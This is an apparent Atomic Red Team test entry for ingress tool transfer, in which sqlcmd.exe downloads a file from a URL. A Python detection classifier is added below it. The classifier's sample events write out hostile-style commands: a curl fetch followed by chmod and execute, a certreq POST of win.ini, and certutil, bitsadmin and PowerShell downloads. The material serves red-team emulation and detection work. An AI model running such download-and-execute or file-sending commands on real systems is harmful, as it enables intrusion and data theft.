One of the Windows packages, `Sqlcmd.exe`, can be abused to download malicious files from C2 servers. This Atomic exhibits similar behavior by downloading a sample zip file from the src directory of this technique's folder via a GitHub URL.
Supported Platforms: Windows
auto_generated_guid: 6934c16e-0b3a-4e7f-ab8c-c414acd32181

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | URL of the C2 server from which the file(s) need to be downloaded | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip |
| local_file_path | The local file path, including filename, where the downloaded file is placed | path | C:\T1105.zip |

Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

```powershell
sqlcmd -i #{remote_url} -o #{local_file_path}
```

Cleanup Commands:

```powershell
rm "#{local_file_path}" 2>$null | Out-Null
```

Dependencies: Run with `powershell`!
Check Prereq Commands:

```powershell
if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
winget install Microsoft.Sqlcmd --silent 2>$null | Out-Null
```
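As an added defender-side example (not part of the Atomic Red Team page or project), the following Python classifier runs over process-creation events (image name plus command line, as a Sysmon Event ID 1 or Security 4688 record carries them) and flags the ingress-tool-transfer command shapes exercised by the tests above, while letting benign look-alikes such as `certutil -hashfile` through. The event samples, rule names and the reserved `example.invalid` host are constructed for this example.

```python
# Added defender-side example (not Atomic Red Team code): flag T1105-style
# ingress tool transfer command lines in process-creation events.
import re
from typing import List, NamedTuple, Tuple


class ProcEvent(NamedTuple):
    image: str          # executable as logged (basename is enough)
    command_line: str   # full command line, e.g. Sysmon EID 1 / Security 4688


class Rule(NamedTuple):
    name: str
    images: Tuple[str, ...]   # lower-case basenames the rule applies to
    pattern: re.Pattern


def _rx(expr: str) -> re.Pattern:
    return re.compile(expr, re.IGNORECASE)


URL = r"https?://\S+"           # an http(s) URL token
UNC = r"\\\\[^\s\\]+\\\S+"      # a \\host\share\... path

# One rule per utility shape exercised by the tests on this page.
RULES = [
    Rule("certutil download", ("certutil.exe",), _rx(r"[-/](urlcache|verifyctl)\b.*[-/]f\b")),
    Rule("bitsadmin transfer job", ("bitsadmin.exe",), _rx(r"/transfer\b")),
    Rule("Defender MpCmdRun download", ("mpcmdrun.exe",), _rx(r"-downloadfile\b")),
    Rule("certreq POST to URL", ("certreq.exe",), _rx(r"-post\b.*-config\s+" + URL)),
    Rule("PowerShell web download", ("powershell.exe", "pwsh.exe"),
         _rx(r"net\.webclient|invoke-webrequest|\biwr\b|downloadstring")),
    Rule("IMEWDBLD/nimgrab fetch", ("imewdbld.exe", "nimgrab.exe"), _rx(URL)),
    Rule("GUP -unzipTo fetch", ("gup.exe",), _rx(r"-unzipto\b")),
    Rule("PrintBrm backup of UNC share", ("printbrm.exe",), _rx(r"-b\b.*-d\s+" + UNC)),
    Rule("replace.exe copy from UNC", ("replace.exe",), _rx(UNC + r".*\s/a\b")),
    Rule("sqlcmd input from URL", ("sqlcmd.exe",), _rx(r"-i\s+" + URL)),
    Rule("finger remote fetch", ("finger.exe", "finger"), _rx(r"\S+@\S+")),
    Rule("curl.exe writing to drop dir", ("curl.exe",),
         _rx(r"(-o|--output)\s+\S*(public|programdata|temp)\S*")),
    Rule("rsync/scp/sftp with remote host", ("rsync", "scp", "sftp"), _rx(r"\S+@\S+:")),
    Rule("whois to non-standard port", ("whois",), _rx(r"-h\s+\S+.*-p\s+\d+")),
    Rule("curl fetch then chmod/exec", ("sh", "bash"), _rx(r"\bcurl\b.*chmod\s+\+x")),
]


def classify(event: ProcEvent) -> List[str]:
    """Names of every rule whose image list and pattern both match the event."""
    image = event.image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return [r.name for r in RULES
            if image in r.images and r.pattern.search(event.command_line)]


def scan(events) -> List[Tuple[str, str]]:
    """(image, rule name) for every event that triggers at least one rule."""
    return [(ev.image, name) for ev in events for name in classify(ev)]


# Constructed samples modelled on the page's commands; example.invalid is a
# reserved placeholder host, not a real server.
SAMPLE_EVENTS = [
    ProcEvent("certutil.exe", "certutil -urlcache -split -f https://example.invalid/LICENSE.txt lic.txt"),
    ProcEvent("bitsadmin.exe", r"bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://example.invalid/l.txt %temp%\l.txt"),
    ProcEvent("MpCmdRun.exe", r"MpCmdRun.exe -DownloadFile -url https://example.invalid/l.txt -path %temp%\l.txt"),
    ProcEvent("certreq.exe", r"certreq.exe -Post -config https://example.invalid c:\windows\win.ini %temp%\l.txt"),
    ProcEvent("powershell.exe", r"powershell.exe iwr -URI https://example.invalid/l.txt -Outfile %temp%\l.txt"),
    ProcEvent("replace.exe", r"C:\Windows\System32\replace.exe \\127.0.0.1\c$\src\redcanary.cab %TEMP% /A"),
    ProcEvent("curl.exe", r"C:\Windows\System32\Curl.exe -k https://example.invalid/a.dll -o c:\users\public\music\a.dll"),
    ProcEvent("rsync", "rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files"),
    ProcEvent("whois", 'whois -h localhost -p 8443 "Hello from Atomic Red Team test T1105"'),
    ProcEvent("sh", "sh -c 'curl -sO https://example.invalid/atomic.sh && chmod +x atomic.sh && bash atomic.sh'"),
    # Benign look-alikes that must not fire.
    ProcEvent("certutil.exe", r"certutil -hashfile C:\installer.msi SHA256"),
    ProcEvent("curl.exe", "curl.exe -s https://example.invalid/health"),
]

if __name__ == "__main__":
    for image, rule in scan(SAMPLE_EVENTS):
        print(f"{image:16} {rule}")
```

The rules key on the child process image rather than on `cmd /c` wrappers, so a `cmd.exe` launching `certutil.exe` is caught on the certutil child event; the patterns are starting points for tuning against your own baseline, not a complete ruleset.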